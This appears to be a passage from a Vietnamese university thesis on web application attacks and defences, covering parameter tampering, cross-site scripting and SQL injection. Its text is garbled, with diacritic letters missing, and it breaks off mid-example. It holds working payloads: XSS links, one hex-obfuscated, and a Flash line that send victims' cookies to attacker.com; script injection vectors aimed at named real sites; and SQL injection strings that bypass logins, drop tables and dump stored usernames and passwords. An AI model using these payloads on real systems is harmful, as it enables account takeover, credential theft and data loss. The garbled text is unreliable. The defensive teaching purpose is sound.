Trn b m T chi dch v Mt vi k thut khc o K t rng o M ha URL o Li dng truy xut ng dn n mt tp tin o Ngn ng pha trnh ch
-Trang 32-
Khoa CNTT
Phn II: Cc k thut tn cng v bo mt ng dng Web
PHN TH HAI
CC K THUT TN CNG V BO MT NG DNG WEB
-Trang 33-
Khoa CNTT
Chng 4: Thao tc trn tham s truyn
Chng 4
THAO TC TRN THAM S TRUYN

Ni dung: I. II. III. IV. Thao tc trn URL Thao tc trong bin n form Thao tc trn cookie Thao tc trong HTTP Header
-Trang 34-
Khoa CNTT
CHNG 4:THAO TC TRN THAM S TRUYN
Thao tc trn tham s truyn l k thut thay i thng tin quan trng trn cookie, URL hay bin n ca form. K thut Cross-Site Scripting, SessionID, SQL Injection, Buffer Overflowcng cn dng n cc tham s ny hon thin cc bc tn cng ca hacker. C th ni cc tham s truyn l u mi cho mi hot ng ca hacker trong qu trnh tn cng ng dng. V th y l ni dung chng u tin c cp trong phn th hai, mc ch cng l h tr tt hn phn trnh by cc chng k tip.
I. THAO TC TRN URL

I.1. Khi nim:
Khi nhp mt form HTML th kt qu s c gi i theo hai cch: GET hay POST. Nu dng GET, th tt c cc tn bin v gi tr ca n s xut hin trong chui URL. V d 4.I.1-1: C mt trang web ng dng cho php thnh vin c thay i mt khu.
http://www.nganhang.com/example?user=thang&newpass=123
Vi: + username l tn ngi cn thay i mt khu. + newpass l mt khu mi cho username Tuy nhin, bng cch thay i tham s nh sau:
-Trang 35-
Khoa CNTT
http://www.nganhang.com/example?user=admin&newpass=111111
Hacker c th thay i mt khu ca admin bng mt mt khu mi bt k, trong v d ny l 1111111
I.2. Mt s bin php khc phc

chng li kiu thay i ni dung mt chui URL, ng dng c th p dng bin php sau: ng dng s dng c ch bng bm (hash table). Sau khi ngi dng chng thc thnh cng vi mt username , ng dng s sinh ra mt kho tng ng. Kho ny s c lu trn server cng vi bin username trong i tng bng bm. Mi khi ngi dng kt ni n ng dng, kho v username ny s c gi i v c so snh vi kho v username trong bng bm. Nu tng ng vi bn ghi trong d liu th hp l. Cn nu khng th server bit rng ngi dng thay i URL. Ngoi ra, vi nhng thng tin c gi tr, cn m ho thng tin ny trc khi cho hin th trn trnh duyt trnh hacker c th sa i ty .
II. THAO TC TRN BIN N FORM

II.1. Khi nim
Thng tin c th c chuyn i thng qua mt bin n ca form, gi l Hidden Form Field. Bin n form khng hin th trn mn hnh trnh duyt nhng ngi dng c th tm thy ni dung ca n trong view source , v th y l mt im yu hacker li dng bng cch lu ni dung trang web xung trnh duyt, thay i ni dung trang v gi n trnh ch.
-Trang 36-
Khoa CNTT
V d 4.II.1-1: Form gc c ni dung nh sau:

<form action="http://www.tancong.com/cuahang.pl" method="POST"> ... <input type="hidden" name="giaca" value="99.99"> ... </form>
Nu khng c s thay i no th yu cu n trnh ch c ni dung :

POST /cuahang.pl HTTP/1.0 ... giaca=99.99
Nhng nu hacker gn mt gi tr khc cho trng giaca :

<form action="http://www.tancong.com/cuahang.pl" method="POST"> ... <input type="hidden" name="giaca" value="0.99"> ... </form>
th yu cu s thay i:
POST /cuahang.pl HTTP/1.0 ... giaca=0.99
Ngoi vic thay i ni dung bin n ca form, hacker cn bin i ni dung cc thnh phn trong form, nh chiu di ca mt nhp d liu thc hin vic tn cng BUFFER OVERFLOW,
-Trang 37-
Khoa CNTT
II.2.
Mt s bin php khc phc
Ch nn s dng bin n ca form hin th d liu trn trnh duyt, khng c s dng gi tr ca bin thao tc trong x l ng dng. Dng bin HTTP_REFERER kim tra ngun gc ca yu cu gi n, tuy nhin hacker c th s dng Proxy che du ngun gc thc ca n, v vy cng khng nn qu tin tng bin HTTP_REFERER kim tra. Ghp tn v gi tr ca bin n thnh mt chui n. S dng thut ton m ho MD5 hoc mt kiu hash mt chiu khc tng hp chui v lu n vo mt hidden field gi l Chui mu. Khi gi tr trong form c gi i, cc thao tc nh trn c thc hin li vi cng mt kho m ta nh trc. Sau em so snh vi Chui mu, nu chng khng khp nhau th chng t gi tr trong biu mu b thay i. Dng mt sessionID tham chiu n thng tin c lu tr trn c s d liu.
-Trang 38-
Khoa CNTT
III. THAO TC TRN COOKIE

III.1. Khi nim
phn th nht, chng 2, mc IV, lun vn trnh by c bn khi nim v cookie. Trong mc ny, lun vn ch trnh by cch thay i mt cookie. V cookie l thnh phn lu tr thng tin bo mt nht nn Cookie thng c dng lu gi trng thi cho giao thc HTTP hn l bin n form v bin URL. N cn c dng lu tr nhng thng tin ca ngi dng khi s dng ng dng v nhng d liu khc ca session. Tt c cc loi cookie nh persistent hay non-persistent, secure hay insecure u c th b thay i bi ngi dng v c gi v cho trnh ch. Do hacker c th thay i ni dung cookie ph hoi ng dng. Vi nhng cng c min ph nh Winhex th non-persistent cookie c th b thay i ni dung. Cn SSL ch c th bo v cookie trong qu trnh truyn. V d 4.III.1-1: v cookie dng lu tr thng tin cho ng dng web thng tin du lch:
Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;
Cookie xc nh ngi dng ny khng phi l Admin (ADMIN=no), nhng nu hacker thay i trng ny iu g s xy ra? Hacker c th thay i li thnh nh sau:
Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;
Hacker lc ny mang vai tr l mt ngi qun tr ca ng dng.
-Trang 39-
Khoa CNTT
III.2. Mt s bin php khc phc

S dng i tng session lu tr thng tin quan trng trn trnh ch. Khi ng dng cn kim tra thng tin ca mt ngi dng, ng dng s dng sessionID ca ngi dng ch n thng tin ca ngi dng trong cache hay c s d liu. Xy dng mt c ch kim tra ni dung ca cookie tm ra nhng gi tr khng hp l t bit c cookie l gi. V d l nu bin c ngi qun tr c c thit lp l ng trong cookie, nhng gi tr ca s th t ngi dng trong cookie li khng ging nh gi tr s th t ca ngi qun tr c lu tr trn server. Phng php cui cng l m ho cookie. C mt s phng php m ho nh symmetric (dng 1 kha duy nht cho c m ha v gii m) hay asymmetric (m ha dng 2 kha ring bit, mt kha dng chung cho m ha v mt kha ring gii m)
IV. THAO TC TRONG HTTP HEADER

URL, bin n form, cookie u l nhng thnh phn lu tr thng tin m ngi dng thng thng c th xem v thay i. Tuy nhin, nhng thnh phn u c chuyn i thng qua HTTP Header. V th, mc d HTTP Header khng phi l tham s truyn ca mt ng dng nhng mi thng tin u c lu tr vo n trc khi chuyn i nn trong phn ny s cp n vic thay i mt HTTP Header.
IV.1. Khi nim

Thng thng ch c trnh duyt v trnh ch l trao i HTTP Header ( xem chi tit trong phn th nht, chng 2, mc II), cn hu ht cc ng dng web th
-Trang 40-
Khoa CNTT
khng. Tuy nhin, hacker c th t vit mt chng trnh iu khin HTTP header (nh xem ni dung, to mi) hay s dng cc proxy min ph cho php thay i d liu c gi t trnh duyt. Ngoi ra hacker c th tn cng trc tip bng cch telnet gi HTTP Request n trnh ch. V d 4.IV.1-1:
su-2.05# telnet localhost 80 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. GET / HTTP/1.0 Referer: www.redhat.com/login.asp User-Agent:  HTTP/1.1 200 OK Date: Mon, 17 Dec 2001 20:39:02 GMT Server: Connection: close Content-Type: text/html
Phn in m l ni dung hacker thay i. V d 4.IV.1-2: Referer header cha URL ca trang web m t yu cu c gi i. V th mt vi ng dng s kim tra thnh phn ny trong header m bo rng n c gi t trang web ca ng dng . Vic lm ny dng ngn chn vic hacker lu li trang web xung my, chnh sa thuc tnh form, ph hoi bng cch nhm vo client side validate hay server side include, sau gi i. Nhng phng php kim tra ny s tht bi khi hacker c th sa li Referer header n ging nh c gi t trang web hp l.
-Trang 41-
Khoa CNTT
Referer: www.redhat.com/login.asp
IV.2. Mt s bin php khc phc

n gin l khng tin tng vo HTTP header nu cha c cc bin php an ton. Vi cc header gi t trnh ch, chng hn nh cookie th c th c m ho. Cn vi cc header gi t trnh khch th khng nn dng cc tham s nh referer, thc hin cc bin php an ton.
Nhn xt:
Mi thng tin quan trng trao i gia trnh duyt v trnh ch khng nn lu tr di dng chui thng thng m cn c m ha, ngoi ra nhng thng tin ny nn c kim tra, i chiu vi d liu trong c s d liu hay trong cache ca trnh ch, phng trnh trng hp ni dung thng tin b sai lch. Bn cnh , vic kim tra d liu ng n l cn thit v hu nh cc k thut tn cng u da vo d liu nhp trn URL, bin n form hay cookie nh kiu tn cng Cross-Site Scripting trong chng k tip hay SQL Injection trong chng 6
-Trang 42-
Khoa CNTT
Chng 5: Chn m lnh thc thi trn trnh duyt nn nhn (Cross Site Scripting)
Chng 5
CHN M LNH THC THI TRN TRNH DUYT NN NHN

Ni dung: I. II. Cross Site Scripting (XSS) Phng php tn cng XSS truyn thng.
III. Mt s WebSite tm thy l hng XSS. IV. Tn cng XSS bng Flash. V. Cch phng chng.
-Trang 43-
Khoa CNTT
CHNG 5: CHN M LNH THC THI TRN TRNH DUYT NN NHN (CROSS SITE SCRIPTING)
I. K THUT TN CNG CROSS SITE SCRIPTING (XSS)

Phng php Cross Site Scripting (c vit tt l XSS) l phng php tn cng bng cch chn thm nhng on m c kh nng nh cp hay thit lp c nhng thng tin quan trng nh cookies, mt khu, vo m ngun ng dng web t chng c chy nh l mt phn ca ng dng Web v c chc nng cung cp hoc thc hin nhng nhng iu hacker mun. Phng php ny khng nhm vo my ch h thng m ch yu tn cng trn chnh my ngi s dng. Hacker s li dng s kim tra lng lo t ng dng v hiu bit hn ch ca ngi dng cng nh bit nh vo s t m ca h dn n ngi dng b mt thng tin mt cch d dng. Thng thng hacker li dng a ch URL a ra nhng lin kt l tc nhn kch hot nhng on chng trnh c vit bng ngn ng my khch nh VBScript, JavaScriptc thc thi trn chnh trnh duyt ca nn nhn. V D 5.I-1:
http://hotwired.lycos.com/webmonkey/00/index1.html?tw=<script>alert (document.cookie);</script>
-Trang 44-
Khoa CNTT
hay: http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_te
xt=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Phn in m l on m c thm vo vi mc ch nh cp cookies ca nn nhn. Trong nhng v d 2.I-1 trn, hu ht nhng tin t URL l a ch ca nhng ng dng Web c tht (VD: http://www.microsoft.com/education, http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/...) li dng cch truyn tham s trn URL m hacker c th d dng thm vo on m nh cp cookie. V d 5.I-1 trn ch minh ha mt cch n gin l thm on m ca mnh vo trang Web thng qua URL. Nhng thc s th c rt nhiu cch thm on m JavaScript vi mc ch tn cng kiu XSS. Hacker c th d dng li dng Document Object Model (DOM) thay i ng cnh v ni dng Web ng dng. Sau y l danh sch ni c th chn on m: V d 5.I-2:
<a href="javascript#[code]"> <div onmouseover="[code]"> <img src="javascript:[code]"> <img dynsrc="javascript:[code]"> <input type="image" dynsrc="javascript:[code]"> <bgsound src="javascript:[code]"> &<script>[code]</script> &{[code]}; <img src=&{[code]};> <lin kt rel="stylesheet" href="javascript:[code]"> <iframe src="vbscript:[code]"> <img src="mocha:[code]">
-Trang 45-
Khoa CNTT
<img src="livescript:[code]"> <a href="about:<script>[code]</script>"> <meta http-equiv="refresh" content="0;url=javascript:[code]"> <body onload="[code]"> <div style="background-image: url(javascript:[code]);"> <div style="behaviour: url([lin kt to code]);"> <div style="binding: url([lin kt to code]);"> <div style="width: expression([code]);"> <style type="text/javascript">[code]</style> <object classid="clsid:..." codebase="javascript:[code]"> <script>[code]</script> <img src="blah"onmouseover="[code]"> <img src="blah>" onmouseover="[code]"> <xml src="javascript:[code]"> <xml id="X"><a><b><script>[code]</script>;</b></a></xml> (ti liu t http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0)
Phn in m l phn c th t on m nh cp thng tin.
II. PHNG PHP TN CNG XSS TRUYN THNG

ng dng Web thng lu tr thng tin quan trng cookie. Cookie l mu thng tin m ng dng lu trn a cng ca ngi s dng. Nhng ch ng dng thit lp ra cookie th mi c th c n. Do ch khi ngi dng ang trong phin lm vic ca ng dng th hacker mi c c hi nh cp cookie. Cng vic u tin ca hacker l tm trang ch d ngi dng ng nhp sau khi tm ra l hng trn ng dng . Cc bc thc hin XSS truyn thng:
-Trang 46-
Khoa CNTT
Hnh 5.II-1. Qu trnh thc hin XSS
Tm tt cc bc thc hin: Bc 1: Hacker bit c ngi dng ang s dng mt ng dng Web c l hng XSS. Bc 2: Ngi dng nhn c 1 lin kt thng qua email hay trn chnh trang Web (nh trn guestbook, banner d dng thm 1 lin kt do chnh hacker to ra). Thng thng hacker khin ngi dng ch bng nhng cu kch thch s t m ca ngi dng nh Kim tra ti khon, Mt phn thng hp dn ang ch bn Bc 3: Chuyn ni dung thng tin (cookie, tn, mt khu) v my ch ca hacker. Bc 4: Hacker to mt chng trnh cgi ( v d 3 ny l steal.cgi) hoc mt trang Web ghi nhn nhng thng tin nh cp vo 1 tp tin Bc 5: Sau khi nhn c thng tin cn thit, hacker c th s dng thm nhp vo ti khon ca ngi dng.
-Trang 47-
Khoa CNTT
V d 5.II-1: khai thc l hng trn ng dng hotwired.lycos.com, hacker c th thc hin nh sau :
<html> <head> <title>Look at this!</title> </head> <body> <a href="http://hotwired.lycos.com/webmonkey/index1.html?tw=<script>do cument.location.replace('http://www.attacker.com/steal.cgi?'+docume nt.cookie);</script>"> Mt phn thng hp dn ang ch bn </a> </body> </html>
Sau khi ngi dng nhp vo lin kt Mt phn thng hp dn ang ch bn, cookie trn my nn nhn s b nh cp v l tham s truyn vo cho chng trnh steal.cgi ca hacker. http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C 20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=10195 11286 Vn t ra l c th ngi lp trnh s bo v ng dng Web ca mnh bng cch lc nhng k t c bit nh , hay + (c th trnh trng hp dng du thc hin cu truy vn SQL chng hn) Nhng hacker c th li dng m hex thay cho nhng k t c bit tn cng. Thay th bng nhng s hex cho nhng k t ASCII. V d 5.II-2:
-Trang 48-
Khoa CNTT
http://www.attacker.com/steal.cgi: h -> 0x0068 t -> 0x0074 t -> 0x0074 p -> 0x0070 : -> 0x003A / -> 0x002F Sau y l v d trong cch dng m hex trong ng dng web. V d 5.II-3:
<html> <head> <title>Look at this!</title> </head> <body> <a href="http://hotwired.lycos.com/webmonkey/index1.html?tw=<script>va r u = String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A); u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0061);
-Trang 49-
Khoa CNTT
u %2B= String.fromCharCode(0x0063);u %2B= String.fromCharCode(0x006B); u %2B= String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0072); u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x006D); u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0073); u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0065); u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x006C); u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x0069); u %2B= String.fromCharCode(0x003F); u %2B=document.cookie;document.location.replace(u);</script>" onMouseOver="window.status=http://www.hotwired.lycos.com/index2.ht ml';return true" onMouseOut="window.status='';return true">Mt phn thng hp dn ang ch bn </a> </body> </html>
III. MT S WEBSITE TM THY L HNG XSS

Tn cng ty NBC Domain Nhng lin kt b khai thc http://www.shop http://www.shopnbc.com/listing.asp?qu=
-Trang 50-
Khoa CNTT
nbc.com
<script>alert(document.cookie)</script>&frompa ge=4 &page=1&ct=VVTV&mh=0&sh=0&RN=1
Microsoft
http://www.micr http://www.microsoft.com/education/?ID=MCTN osoft.com/ &target=http://www.microsoft.com/education/?ID= MCTN &target=<script>alert(document.cookie)</script>
Chase
https://www.cha se.com/
https://www.chase.com/chase/gx.cgi/FTcs?pagenam e=<script>alert(document.cookie)</script> &urlname=smallbusiness/direct
EBay
https://scgi.ebay. https://scgi.ebay.co.uk/sawco.uk/ cgi/eBayISAPI.dll?SSLRegisterShow &countryid=3&siteId=3&co_partnerId=0&UsingSS L=1 &aolemail=<script>alert(document.cookie) </script>
Oracle Japan
http://www.orac le.co.jp/
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/i m_search_exe? search_text=<script>alert(document.cookie) </script>
IV. TN CNG XSS BNG FLASH

Ngoi nhng cch a mt on m nguy him th hacker cn c th li dng nhng tp tin flash nh cp thng tin.
-Trang 51-
Khoa CNTT
Macromedia Flash cho php lp trnh bng mt ngn ng kch bn c xy dng sn trong Flash l ActionScript. ActionScript c c php n gin v tng t nh JavaScript, C hay PERL. V d hm getURL() dng gi mt trang web khc, tham s thng l mt URL chng hn nh http://www.yahoo.com. V d 5.IV-1:
getURL(http://www.yahoo.com)
Tuy nhin c th thay th URL bng JavaScript:

getURL(javascript:alert(document.cookie))
V d 5.IV-1 trn s lm xut hin bng thng bo cha cookie ca trang web cha tp tin flash . Nh vy l trang web b tn cng, bng cch chn mt on JavaScript vo ng dng Web thng qua tp tin flash. Mt v d khc r hn v cch tn cng ny l: y l on lnh trong tp tin flash v s c thi hnh khi tp tin flash c c:
getURL(javascript:location(http://www.attacker.com?newcookie=+do cument.cookie))
Nh vy l khi ngi dng xem trang web cha tp tin flash ny th ngay lp tc cookie ca h do trang web cha tp tin flash to ra s gi v cho hacker.
-Trang 52-
Khoa CNTT
Hnh 5.IV-2: Cch vit Action Scipt trong Flash
V d 5.IV-2: DeviantArt l mt trang web ni ting, cho php thnh vin ca n gi cc tp tin flash ln cho mi thnh vin cng xem. V th hacker c th n cp cookie ca cc thnh vin v cng c th l ti khon ca ngi qun tr web, bng cch ng k lm thnh vin ca ng dng Web ny, gi tp tin flash ln my ch v i cc nn nhn xem tp tin flash . Di y l a ch lin kt dn mt tp tin flash nh trnh by trong v d 5.IV-2:
http://www.deviantart.com/deviation/1386080
Ngoi ra cc trang web cho php thnh vin gi d liu dng HTML nh din n, cc chc nng to ch k ring, cng c th l mc tiu ca cch tn cng ny, bng cch nhp on m gi tp tin flash vo.
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/s wflash.cab#version=6,0,0,0" WIDTH="60"
-Trang 53-
Khoa CNTT
HEIGHT="48" id="1" ALIGN=""> <PARAM NAME=movie VALUE="http://www.ke_tan_cong.com/vidu.swf"> <PARAM NAME=quality VALUE=high> <PARAM NAME=bgcolor VALUE=#FF9900> <EMBED src=" http://www.ke_tan_cong.com/vidu.swf" quality=high bgcolor=#FF9900 WIDTH="60" HEIGHT="48" NAME="1" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"> </EMBED> </OBJECT>
V. CCH PHNG CHNG

Vi nhng d liu, thng tin nhp ca ngi dng, ngi thit k ng dng Web cn phi thc hin vi bc c bn sau: o To ra danh sch nhng th HTML c php s dng. o Xa b th <script> o Lc ra bt k mt on m JavaScript/Java/VBScript/ActiveX/Flash Related no. o Lc du nhy n hay kp o Lc k t Null ( v kh nng thm mt on m bt k sau k t Null khin cho ng dng d lc b th <script> vn khng nhn ra do ng dng ngh rng chui kt thc t k t Null ny).
-Trang 54-
Khoa CNTT
o Xa nhng k t > , < o Vn cho php nhp nhng k t c bit nhng s c m ha theo chun ring. i vi ngi dng, cn cu hnh li trnh duyt nhc nh ngi dng c cho thc thi ngn ng kch bn trn my ca h hay khng? Ty vo mc tin cy m ngi dng s quyt nh.
Nhn xt:
K thut XSS kh ph bin v d dng p dng, tuy nhin mc thit hi ch dng li mc tn cng trn my nn nhn thng qua nhng lin kt hay form la o m hacker a n cho nn nhn. V th, ngoi vic ng dng kim tra tnh ng n ca d liu trc khi s dng th vic cn nht l ngi dng nn cnh gic trc khi bc vo mt trang Web mi. C th ni, nh vo s cnh gic ca ngi dng th 90% t c s bo mt trong k thut ny. Tuy nhin, trong chng 6, s tn cng li nhm vo my ch, nhm thu thp thng tin trong c s d liu v t ginh quyn qun tr ng dng.
-Trang 55-
Khoa CNTT
Chng 6: Chn cu truy vn SQL (SQL Injection)
Chng 6
CHN CU TRUY VN SQL

Ni dung: I. II. Khi nim SQL Injection Gii thiu m hnh c s d liu.
III. Cc cch tn cng. IV. Cch phng chng .
-Trang 56-
Khoa CNTT
CHNG 6: CHN CU TRUY VN SQL (SQL INJECTION)
I. KHI NIM SQL INJECTION

SQL Injection l cch li dng nhng l hng trong qu trnh lp trnh Web v phn truy xut c s d liu. y khng ch l khuyt im ca ring SQL Server m n cn l vn chung cho ton b cc c s d liu khc nh Oracle, MS Access hay IBM DB2. Khi hacker gi nhng d liu (thng qua cc form), ng dng Web s thc hin v tr v cho trnh duyt kt qu cu truy vn hay nhng thng bo li c lin quan n c s d liu. V nh nhng thng tin ny m hacker bit c ni dung c s d liu v t c th iu khin ton b h thng ng dng.
II. GII THIU M HNH C S D LIU

trnh by tt hn ni dung k thut ny, lun vn s dng bng User minh ha k thut tn cng. Bng User:
STT Tn trng 1 2 Ci t vt Kiu l tkUsername Kha chnh tkPassword trng Text Text Kch thc 50 50 Mi ngi dng c 1 account ng nhp. Password nhp ng Din gii
-Trang 57-
Khoa CNTT
Quy c: Ngn ng lp trnh s dng minh ha trong chng ny l ASP vi c s d liu l SQL Server.
III. CC CCH TN CNG

III.1. K thut tn cng SQL Injection
Di y l k thut SQL injection n gin nht, dng vt qua cc form ng nhp. V d 6.III.1-1: gi s ng dng web c on m sau:
SQLQuery= SELECT tkUsername FROM User WHERE tkUsername= & strUsername & AND Password= & tkPassword & flag= GetQueryResult (SQLQuery) if flag = then check=FALSE else check=TRUE end if
on m trn kim tra chui nhp Username v Password. Nu tn ti trong bng User th check=true ngc li check=false. Gi tri nhp vo l:
Username: OR = Password: OR =
-Trang 58-
Khoa CNTT
Cu lnh SQL lc ny nh sau:

SELECT tkUsername FROM User WHERE tkUsername= OR = Password= OR = AND
Cu lnh so snh trn lun lun ng (v lun bng ). Do cu iu kin trong mnh WHERE lun ng. Gi tr tn ngi s dng ca dng u tin trong bng s c chn. Kt hp vi k t c bit ca SQL : k t ; : nh du kt thc 1 cu truy vn k t -- : n chui k t pha sau n trn cng 1 dng V d 6.III.1-2:
Username: ; drop table User-Password:
Cu lnh SQL lc ny nh sau:

SELECT tkUsername FROM User WHERE tkUsername= ;drop table User-- AND Password= & tkPassword &
Vi cu lnh trn th bng User s b xa hon ton. V d 6.III.1-3: Mt v d khc s dng k t c bit SQL thm nhp vo h thng nh sau:
Username: admin-Password:
-Trang 59-
Khoa CNTT
Cu lnh SQL nh sau:

SELECT tkUsername FROM User WHERE tkUsername= admin-AND Password= & tkPassword &
Cu lnh trn cho php ng nhp vo h thng vi quyn admin m khng i hi password.
III.2. Tn cng da vo cu lnh SELECT

Ngoi k thut n gin trn, vic tn cng thng da trn nhng thng bo li ly thng tin v bng cng nh nhng trng trong bng. lm c iu ny, cn phi hiu nhng thng bo li v t chnh sa ni dung nhp cho ph hp. Khi nim Direct Injection: Nhng i s c thm vo trong cu lnh m khng nm gia nhng du nhy n hay du ngoc kp l trng hp direct injection. V d III.2.1 V d 6.III.2-1:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername=& tName
Khi nim Quote Injection: Nhng trng hp i s c nhp vo u c ng dng cho vo gia hai du nhy n hay ngoc kp l trng hp Quote Injection. V d III.2.2 V d 6.III.2-2:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername=& tName &
-Trang 60-
Khoa CNTT
v hiu ho du nhy v thay i cu lnh m vn gi c c php ng, chui m chn thm vo phi c mt du nhy n trc chui k t c chn vo v cui cu lnh phi c mt du nhy n, chng hn nh sau:
StrSQL=SELECT = tkUsername FROM User WHERE tkUsername= and
Nu thc hin nh trn m thng bo li c lin quan n du ( th trong chui chn vo phi c ): V d 6.III.2-3: Gi s:
StrSQL=SELECT tkUsername FROM User WHERE (tkUsername=& tName & )
Th c php hp l nh sau:
StrSQL=SELECT = tkUsername FROM User WHERE (tkUsername=)or
Ngoi ra k t % thng c dng trong nhng trng hp tm kim thng tin. V d 6.III.2-4:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername like % & tName &
-Trang 61-
Khoa CNTT
III.3. Tn cng da vo cu lnh HAVING

HAVING s dng cng chung vi mnh GROUP BY l phng php hu hiu nhn thng tin bng, trng v s c bn su hn trong phn 4.
III.4. Tn cng da vo cu lnh kt hp UNION

Lnh SELECT c dng ly thng tin t c s d liu. Thng thng v tr c th c chn thm vo mt mnh SELECT l sau WHERE. c th tr v nhiu dng thng tin trong bng, thay i iu kin trong mnh WHERE bng cch chn thm UNION SELECT. V d 6.III.4-1:
StrSQL=SELECT tkUsername FROM User WHERE tkUsername like % & tName & UNION SELECT tkPassword from User
Cu lnh trn tr v mt tp kt qu l s kt hp gia tkUsername vi tkPassword trong bng User. Ghi ch: S ct trong hai cu SELECT phi khp vi nhau. Ngha l s lng ct trong cu lnh SELECT ban u v cu lnh UNION SELECT pha sau bng nhau v cng kiu. Nh vo li c php tr v sau khi chn thm cu lnh UNION m c th bit kiu ca mi trng.
-Trang 62-
Khoa CNTT
Sau y l nhng v d c thc hin khi khng bit ni dung c s d liu da vo HAVING, GROUP BY, UNION: V d 6.III.4-2: Nhc li cu truy vn cn ng nhp:
SQLQuery= & SELECT tkUsername,tkPassword FROM User WHERE tkUsername= & strUsername & AND Password= & tkPassword
u tin, bit tn bng v tn trng m cu truy vn s dng, s dng cu iu kin having , nh v d sau: Gi tr nhp vo:
Username: having 1=1--
Li pht sinh:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
Nh vo li pht sinh ny m bit c bng s dng trong cu truy vn l User v trong bng tn ti mt trng tn l tkUsername. Sau s dng GROUP BY: V d 6.III.4-3:
Username: group by User.tkUsername having 1=1--
-Trang 63-
Khoa CNTT
Li pht sinh:
[Microsoft][ODBC SQL Server Driver][SQL Server] Column'User.tkPassword'is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
Nh vy tkPassword l mt trng ca bng User v c s dng trong cu truy vn. Tip tc dng GROUP BY cho n khi bit c tt c cc trng trong bng User tham gia vo cu truy vn. Khi khng cn bo li c php GROUP BY na th chuyn qua cng on kim tra kiu ca tng trng trong bng. Lc ny UNION c s dng: V d 6.III.4-4:
Username:union select sum(tkUsername) from User
Lnh sum l lnh tnh tng cho i s bn trong du ngoc. i s phi l kiu s. Nu i s khng l kiu s th pht sinh li nh sau:
[Microsoft][ODBC an argument. SQL Server Driver][SQL Server]The sum or
average aggregate operation cannot take a varchar data type as
Nh vy vi thng ip li nh trn th tkUsername chc chn phi l kiu varchar.
-Trang 64-
Khoa CNTT
Vi phng php trn, d dng xc nh c kiu ca tng trng trong bng. Sau khi nhn y trng tin trn th hacker d dng t thm thng tin vo bng User. V d 6.III.4-5:
Username:; insert into User(tkUsername,tkPassword) values (admin, )--
Hacker thm ni dung nh V d 6.III.4.2.4 by gi tr thnh ngi qun tr mng m khng cn mt khu chng thc. V d 6.III.4-6: minh ho mt cng on s gip hacker c ht thng tin trong bng User: Bc 1: To mt Stored procedure chp vo tt c thng tin ca 2 trng tkUsername v tkPassword trong bng User thnh mt chui vo mt bng mi l foo c mt trng l ret bng on m sau:
create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo end
Thc thi cu lnh bng cch nhp vo form.

Username:;Create varchar(8000) set proc test as begin declare @ret @ret=: select @ret=@ret+'
-Trang 65-
Khoa CNTT
'+tkUsername+'/'+tkPassword from User select @ret as ret into foo
Bc 2: Gi Stored procedure Sau khi to c stored procedure nh trn, thc hin li gi hm:
Username:;exec test
Bc 3: Dng UNION xem ni dung bng foo

Username:;select ret,1 from foo union select 1,1 from foo
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC Server]Syntax error SQL Server varchar Driver][SQL value ': convertingthe
admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu' to a column of data type int.
Qua mt s cng on, hacker thu c ni dung ca bng User gm c tn tkUsername v mt khu tkPassword. Bc 4: Ngoi ra hacker cn c th cn thn xo bng foo xo du vt:
Username: ; drop table foo--
V d 6.III.4-7: Cn y l mt cch khc xc nh ni dung ca bng User, cn mt phng php tm kim thng tin nh sau: Bc 1: Tm tun t tng dng trn bng User
Username:union select 1,1
-Trang 66-
Khoa CNTT
hoc :
Username:union tkUsername> a-select min(tkUsername),1 from User where
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC int. SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type
Ngi u tin trong bng User l admin. Bc 2: bit cc gi tr tip theo, nhp chui sau:
Username:;select min(tkUsername),1 from User where tkUsername> adminunion select 1,1 from User
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC converting the varchar value 'nhimmap' to a column of data type int. SQL Server Driver][SQL Server]Syntax error
Bc 3: Thc hin nh bc 2 cho ra kt qu l tng dng vi trng tkUsername trong bng User.
-Trang 67-
Khoa CNTT
Bc 4: bit thm v tkPasswork, c th thc hin nh sau:

Username:;select tkPassword,1 from User where tkUsername= adminunion select 1,1 from User
Li pht sinh:
